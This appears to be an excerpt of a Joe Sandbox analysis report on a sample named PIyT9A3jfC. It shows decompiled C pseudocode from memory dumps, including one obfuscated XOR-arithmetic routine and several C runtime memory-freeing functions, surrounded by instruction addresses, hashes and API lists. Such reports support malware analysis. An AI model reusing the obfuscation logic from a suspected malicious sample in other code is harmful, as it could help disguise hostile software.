                                                                                                                                                                                                                                                                      			}































                                                                                                                                                                                                                                                                      0x0119885f
                                                                                                                                                                                                                                                                      0x0119886b
                                                                                                                                                                                                                                                                      0x01198877
                                                                                                                                                                                                                                                                      0x01198882
                                                                                                                                                                                                                                                                      0x0119888b
                                                                                                                                                                                                                                                                      0x01198897
                                                                                                                                                                                                                                                                      0x011988a2
                                                                                                                                                                                                                                                                      0x011988a8
                                                                                                                                                                                                                                                                      0x011988b4
                                                                                                                                                                                                                                                                      0x01198a91
                                                                                                                                                                                                                                                                      0x01198a96
                                                                                                                                                                                                                                                                      0x01198aaf
                                                                                                                                                                                                                                                                      0x01198c1b
                                                                                                                                                                                                                                                                      0x01198ab5
                                                                                                                                                                                                                                                                      0x01198acd
                                                                                                                                                                                                                                                                      0x01198b0c
                                                                                                                                                                                                                                                                      0x01198b1f
                                                                                                                                                                                                                                                                      0x01198b2a
                                                                                                                                                                                                                                                                      0x01198b40
                                                                                                                                                                                                                                                                      0x01198b51
                                                                                                                                                                                                                                                                      0x01198b5d
                                                                                                                                                                                                                                                                      0x01198b63
                                                                                                                                                                                                                                                                      0x01198b6f
                                                                                                                                                                                                                                                                      0x01198b78
                                                                                                                                                                                                                                                                      0x01198b81
                                                                                                                                                                                                                                                                      0x01198b8c
                                                                                                                                                                                                                                                                      0x01198b97
                                                                                                                                                                                                                                                                      0x01198b9d
                                                                                                                                                                                                                                                                      0x01198bc0
                                                                                                                                                                                                                                                                      0x01198bdc
                                                                                                                                                                                                                                                                      0x01198bf6
                                                                                                                                                                                                                                                                      0x01198bf6
                                                                                                                                                                                                                                                                      0x01198bfc
                                                                                                                                                                                                                                                                      0x011988ba
                                                                                                                                                                                                                                                                      0x011988ca
                                                                                                                                                                                                                                                                      0x011988d6
                                                                                                                                                                                                                                                                      0x011988d9
                                                                                                                                                                                                                                                                      0x011988e6
                                                                                                                                                                                                                                                                      0x01198908
                                                                                                                                                                                                                                                                      0x01198908
                                                                                                                                                                                                                                                                      0x01198914
                                                                                                                                                                                                                                                                      0x0119891c
                                                                                                                                                                                                                                                                      0x01198926
                                                                                                                                                                                                                                                                      0x0119892f
                                                                                                                                                                                                                                                                      0x01198944
                                                                                                                                                                                                                                                                      0x01198944
                                                                                                                                                                                                                                                                      0x0119894a
                                                                                                                                                                                                                                                                      0x0119895a
                                                                                                                                                                                                                                                                      0x0119897c
                                                                                                                                                                                                                                                                      0x01198982
                                                                                                                                                                                                                                                                      0x01198988
                                                                                                                                                                                                                                                                      0x0119898d
                                                                                                                                                                                                                                                                      0x0119898d
                                                                                                                                                                                                                                                                      0x011989a6
                                                                                                                                                                                                                                                                      0x011989ab
                                                                                                                                                                                                                                                                      0x011989ab
                                                                                                                                                                                                                                                                      0x011989bf
                                                                                                                                                                                                                                                                      0x011989d1
                                                                                                                                                                                                                                                                      0x011989d7
                                                                                                                                                                                                                                                                      0x011989dd
                                                                                                                                                                                                                                                                      0x01198a03
                                                                                                                                                                                                                                                                      0x01198a03
                                                                                                                                                                                                                                                                      0x01198a25
                                                                                                                                                                                                                                                                      0x01198a38
                                                                                                                                                                                                                                                                      0x01198a72
                                                                                                                                                                                                                                                                      0x01198a3a
                                                                                                                                                                                                                                                                      0x01198a6c
                                                                                                                                                                                                                                                                      0x01198a6c
                                                                                                                                                                                                                                                                      0x01198a7c
                                                                                                                                                                                                                                                                      0x01198c2a

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: b022871b35e6126dcd263aa553a12147814ac41afa4760313484668b4f4fdcf1
                                                                                                                                                                                                                                                                      • Instruction ID: 917dd369a5fe1dd664fe03deec2985e4e27f0178754f677e98f2fc25adf45ed2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b022871b35e6126dcd263aa553a12147814ac41afa4760313484668b4f4fdcf1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC10B70A00109DFDB18CF58D594BADBBB6FB88304F548279EA199F795CB34E941CB84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E011814C0(signed int _a4, signed int _a8, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				signed int _t112;
                                                                                                                                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                                                                                                                                      				intOrPtr _t114;
                                                                                                                                                                                                                                                                      				intOrPtr _t129;
                                                                                                                                                                                                                                                                      				intOrPtr _t149;
                                                                                                                                                                                                                                                                      				intOrPtr _t159;
                                                                                                                                                                                                                                                                      				intOrPtr _t172;
                                                                                                                                                                                                                                                                      				intOrPtr _t174;
                                                                                                                                                                                                                                                                      				void* _t175;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v20 = _a20 ^ 0x000003de;
                                                                                                                                                                                                                                                                      				_v28 = _a20 ^ 0x000002ad;
                                                                                                                                                                                                                                                                      				_v64 = _a4 - 0x26e5;
                                                                                                                                                                                                                                                                      				_v68 = _a8 + 0x261;
                                                                                                                                                                                                                                                                      				_v12 = _a8 ^ 0x00000236;
                                                                                                                                                                                                                                                                      				_v24 = _a24 + 0xd9;
                                                                                                                                                                                                                                                                      				_v8 = _a4 ^ 0x00000ee4;
                                                                                                                                                                                                                                                                      				_v32 = _a8 ^ 0x00000327;
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_a28 + 0x74)) ==  *((intOrPtr*)(_a28 + 0xb4))) {
                                                                                                                                                                                                                                                                      					_t174 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t25 = _t174 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      					_t149 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t149 + 0x5c)) =  *_t25 -  *((intOrPtr*)(_a28 + 0xb8)) + 0x44559;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v8 >= (_v12 ^ 0x00000236)) {
                                                                                                                                                                                                                                                                      					if(_v8 < (_v28 ^ 0x000001b4)) {
                                                                                                                                                                                                                                                                      						_v16 = _v20;
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							_t159 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t42 = _t159 + 0xb4; // 0x0
                                                                                                                                                                                                                                                                      							if(_v16 >= ( *0x01DCB205 |  *_t42) - _v20) {
                                                                                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_a28 + 0xbadbdd)) <= (_v8 ^ 0x00002565)) {
                                                                                                                                                                                                                                                                      								_t129 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								_v60 = _t129;
                                                                                                                                                                                                                                                                      								_v56 = _v28 + _v8 |  *(_a28 + 0x7c);
                                                                                                                                                                                                                                                                      								_v52 = _v24 - _v8;
                                                                                                                                                                                                                                                                      								_v48 =  *(_a28 + 0x78) | 0x00002633;
                                                                                                                                                                                                                                                                      								_v44 = ( *(_a28 + 0x3c) |  *(_a28 + 0xe4)) & _v8;
                                                                                                                                                                                                                                                                      								_v40 = (_v24 ^ 0x0000283a) & 0x000026e5;
                                                                                                                                                                                                                                                                      								_v36 = _v20 + _v32 - 0x2674;
                                                                                                                                                                                                                                                                      								_t112 = E01198850(_v60, _v56, _v52, _v48, _v44, _v40, _v36);
                                                                                                                                                                                                                                                                      								_t175 = _t175 + 0x1c;
                                                                                                                                                                                                                                                                      								_v24 = _t112;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v16 = _v16 + 2;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t113 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t172 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t33 = _t172 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      						_t114 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t114 + 0x5c) =  *(_t113 + 0xfc) ^ 0x0002ccfe ^  *_t33;
                                                                                                                                                                                                                                                                      						_v12 = _v12 + 0x23;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L11:
                                                                                                                                                                                                                                                                      				return _v12 - 0x254;
                                                                                                                                                                                                                                                                      			}




























                                                                                                                                                                                                                                                                      0x011814ce
                                                                                                                                                                                                                                                                      0x011814da
                                                                                                                                                                                                                                                                      0x011814e6
                                                                                                                                                                                                                                                                      0x011814f1
                                                                                                                                                                                                                                                                      0x011814fd
                                                                                                                                                                                                                                                                      0x01181509
                                                                                                                                                                                                                                                                      0x01181514
                                                                                                                                                                                                                                                                      0x01181520
                                                                                                                                                                                                                                                                      0x0118153b
                                                                                                                                                                                                                                                                      0x01181555
                                                                                                                                                                                                                                                                      0x0118155b
                                                                                                                                                                                                                                                                      0x01181560
                                                                                                                                                                                                                                                                      0x01181566
                                                                                                                                                                                                                                                                      0x01181566
                                                                                                                                                                                                                                                                      0x01181575
                                                                                                                                                                                                                                                                      0x01181586
                                                                                                                                                                                                                                                                      0x011815c4
                                                                                                                                                                                                                                                                      0x011815d2
                                                                                                                                                                                                                                                                      0x011815da
                                                                                                                                                                                                                                                                      0x011815e6
                                                                                                                                                                                                                                                                      0x011815f2
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01181610
                                                                                                                                                                                                                                                                      0x01181616
                                                                                                                                                                                                                                                                      0x0118161c
                                                                                                                                                                                                                                                                      0x01181634
                                                                                                                                                                                                                                                                      0x0118163d
                                                                                                                                                                                                                                                                      0x0118164b
                                                                                                                                                                                                                                                                      0x01181660
                                                                                                                                                                                                                                                                      0x01181672
                                                                                                                                                                                                                                                                      0x01181682
                                                                                                                                                                                                                                                                      0x011816a1
                                                                                                                                                                                                                                                                      0x011816a6
                                                                                                                                                                                                                                                                      0x011816a9
                                                                                                                                                                                                                                                                      0x011816a9
                                                                                                                                                                                                                                                                      0x011815cf
                                                                                                                                                                                                                                                                      0x011815cf
                                                                                                                                                                                                                                                                      0x01181588
                                                                                                                                                                                                                                                                      0x01181590
                                                                                                                                                                                                                                                                      0x011815a2
                                                                                                                                                                                                                                                                      0x011815a8
                                                                                                                                                                                                                                                                      0x011815ab
                                                                                                                                                                                                                                                                      0x011815b0
                                                                                                                                                                                                                                                                      0x011815b9
                                                                                                                                                                                                                                                                      0x011815b9
                                                                                                                                                                                                                                                                      0x01181586
                                                                                                                                                                                                                                                                      0x011816b1
                                                                                                                                                                                                                                                                      0x011816bc

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 0c7b38e96b873706699d3f01d59387e899a2d5b157e2538f901f2046ef78a011
                                                                                                                                                                                                                                                                      • Instruction ID: 3df50f3af026676b46e6bdebf487f8613f6e5947b5dd2f14345b6338e9c7a0b4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c7b38e96b873706699d3f01d59387e899a2d5b157e2538f901f2046ef78a011
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8610B71A00109DFDB08DF98D594AAEB7F1FF48304F55826AE919AB345C734E941CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118AC2C(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t74 = _a4;
                                                                                                                                                                                                                                                                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                                      				if(_t25 != 0 && _t25 != 0x121dd10) {
                                                                                                                                                                                                                                                                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                                      					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                                      						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                                      							E0118A6DA(_t46);
                                                                                                                                                                                                                                                                      							E0118BA92( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                                      						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                                      							E0118A6DA(_t47);
                                                                                                                                                                                                                                                                      							E0118BB90( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						E0118A6DA( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                                      						E0118A6DA( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                                      				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0118AD9F( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                                      				_t28 = 6;
                                                                                                                                                                                                                                                                      				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                                      				_v8 = _t28;
                                                                                                                                                                                                                                                                      				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t70 - 8)) != 0x121d7d0) {
                                                                                                                                                                                                                                                                      						_t31 =  *_t70;
                                                                                                                                                                                                                                                                      						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                                      							E0118A6DA(_t31);
                                                                                                                                                                                                                                                                      							E0118A6DA( *_t55);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t28 = _v8;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                                      						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                                      							E0118A6DA(_t29);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t28 = _v8;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                      					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                                      					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                      					_v8 = _t28;
                                                                                                                                                                                                                                                                      				} while (_t28 != 0);
                                                                                                                                                                                                                                                                      				return E0118A6DA(_t74);
                                                                                                                                                                                                                                                                      			}















                                                                                                                                                                                                                                                                      0x0118ac34
                                                                                                                                                                                                                                                                      0x0118ac38
                                                                                                                                                                                                                                                                      0x0118ac40
                                                                                                                                                                                                                                                                      0x0118ac49
                                                                                                                                                                                                                                                                      0x0118ac4e
                                                                                                                                                                                                                                                                      0x0118ac55
                                                                                                                                                                                                                                                                      0x0118ac5d
                                                                                                                                                                                                                                                                      0x0118ac65
                                                                                                                                                                                                                                                                      0x0118ac70
                                                                                                                                                                                                                                                                      0x0118ac76
                                                                                                                                                                                                                                                                      0x0118ac77
                                                                                                                                                                                                                                                                      0x0118ac7f
                                                                                                                                                                                                                                                                      0x0118ac87
                                                                                                                                                                                                                                                                      0x0118ac92
                                                                                                                                                                                                                                                                      0x0118ac98
                                                                                                                                                                                                                                                                      0x0118ac9c
                                                                                                                                                                                                                                                                      0x0118aca7
                                                                                                                                                                                                                                                                      0x0118acad
                                                                                                                                                                                                                                                                      0x0118ac4e
                                                                                                                                                                                                                                                                      0x0118acae
                                                                                                                                                                                                                                                                      0x0118acb6
                                                                                                                                                                                                                                                                      0x0118acc9
                                                                                                                                                                                                                                                                      0x0118acdc
                                                                                                                                                                                                                                                                      0x0118acea
                                                                                                                                                                                                                                                                      0x0118acf5
                                                                                                                                                                                                                                                                      0x0118acfa
                                                                                                                                                                                                                                                                      0x0118ad03
                                                                                                                                                                                                                                                                      0x0118ad0b
                                                                                                                                                                                                                                                                      0x0118ad0c
                                                                                                                                                                                                                                                                      0x0118ad12
                                                                                                                                                                                                                                                                      0x0118ad15
                                                                                                                                                                                                                                                                      0x0118ad18
                                                                                                                                                                                                                                                                      0x0118ad1f
                                                                                                                                                                                                                                                                      0x0118ad21
                                                                                                                                                                                                                                                                      0x0118ad25
                                                                                                                                                                                                                                                                      0x0118ad2d
                                                                                                                                                                                                                                                                      0x0118ad34
                                                                                                                                                                                                                                                                      0x0118ad3a
                                                                                                                                                                                                                                                                      0x0118ad3b
                                                                                                                                                                                                                                                                      0x0118ad3b
                                                                                                                                                                                                                                                                      0x0118ad42
                                                                                                                                                                                                                                                                      0x0118ad44
                                                                                                                                                                                                                                                                      0x0118ad49
                                                                                                                                                                                                                                                                      0x0118ad51
                                                                                                                                                                                                                                                                      0x0118ad56
                                                                                                                                                                                                                                                                      0x0118ad57
                                                                                                                                                                                                                                                                      0x0118ad57
                                                                                                                                                                                                                                                                      0x0118ad5a
                                                                                                                                                                                                                                                                      0x0118ad5d
                                                                                                                                                                                                                                                                      0x0118ad60
                                                                                                                                                                                                                                                                      0x0118ad63
                                                                                                                                                                                                                                                                      0x0118ad63
                                                                                                                                                                                                                                                                      0x0118ad75

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0118AC70
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BAAF
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BAC1
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BAD3
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BAE5
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BAF7
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB09
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB1B
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB2D
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB3F
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB51
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB63
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB75
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BA92: _free.LIBCMT ref: 0118BB87
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AC65
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: HeapFree.KERNEL32(00000000,00000000,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?), ref: 0118A6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: GetLastError.KERNEL32(?,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?,?), ref: 0118A702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AC87
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AC9C
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118ACA7
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118ACC9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118ACDC
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118ACEA
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118ACF5
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AD2D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AD34
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AD51
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118AD69
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                                                      • Opcode ID: 2e378e9350462b57d18d286abd4a11be858c3a4f119acd1e0ddd40fffa213083
                                                                                                                                                                                                                                                                      • Instruction ID: 3e27949043bf4c00d5a3a18255f39a4b3cee44e12339beb846e5b8fdc5fe41a0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e378e9350462b57d18d286abd4a11be858c3a4f119acd1e0ddd40fffa213083
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65317E716047059FEB29BE38E804B5A77E8FF60299F24C91BE449C71A4DB32E880DE54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01189B3C(char _a4) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t26 = _a4;
                                                                                                                                                                                                                                                                      				_t52 =  *_a4;
                                                                                                                                                                                                                                                                      				if( *_a4 != 0x11d7298) {
                                                                                                                                                                                                                                                                      					E0118A6DA(_t52);
                                                                                                                                                                                                                                                                      					_t26 = _a4;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                                      				E0118A6DA( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                                                                                                                                                      				E01189A02(5,  &_v8);
                                                                                                                                                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                                                                                                                                                      				return E01189A52(4,  &_v8);
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x01189b42
                                                                                                                                                                                                                                                                      0x01189b45
                                                                                                                                                                                                                                                                      0x01189b4d
                                                                                                                                                                                                                                                                      0x01189b50
                                                                                                                                                                                                                                                                      0x01189b55
                                                                                                                                                                                                                                                                      0x01189b58
                                                                                                                                                                                                                                                                      0x01189b5c
                                                                                                                                                                                                                                                                      0x01189b67
                                                                                                                                                                                                                                                                      0x01189b72
                                                                                                                                                                                                                                                                      0x01189b7d
                                                                                                                                                                                                                                                                      0x01189b88
                                                                                                                                                                                                                                                                      0x01189b93
                                                                                                                                                                                                                                                                      0x01189b9e
                                                                                                                                                                                                                                                                      0x01189ba9
                                                                                                                                                                                                                                                                      0x01189bb7
                                                                                                                                                                                                                                                                      0x01189bbf
                                                                                                                                                                                                                                                                      0x01189bc8
                                                                                                                                                                                                                                                                      0x01189bd0
                                                                                                                                                                                                                                                                      0x01189be4

                                                                                                                                                                                                                                                                      APIs
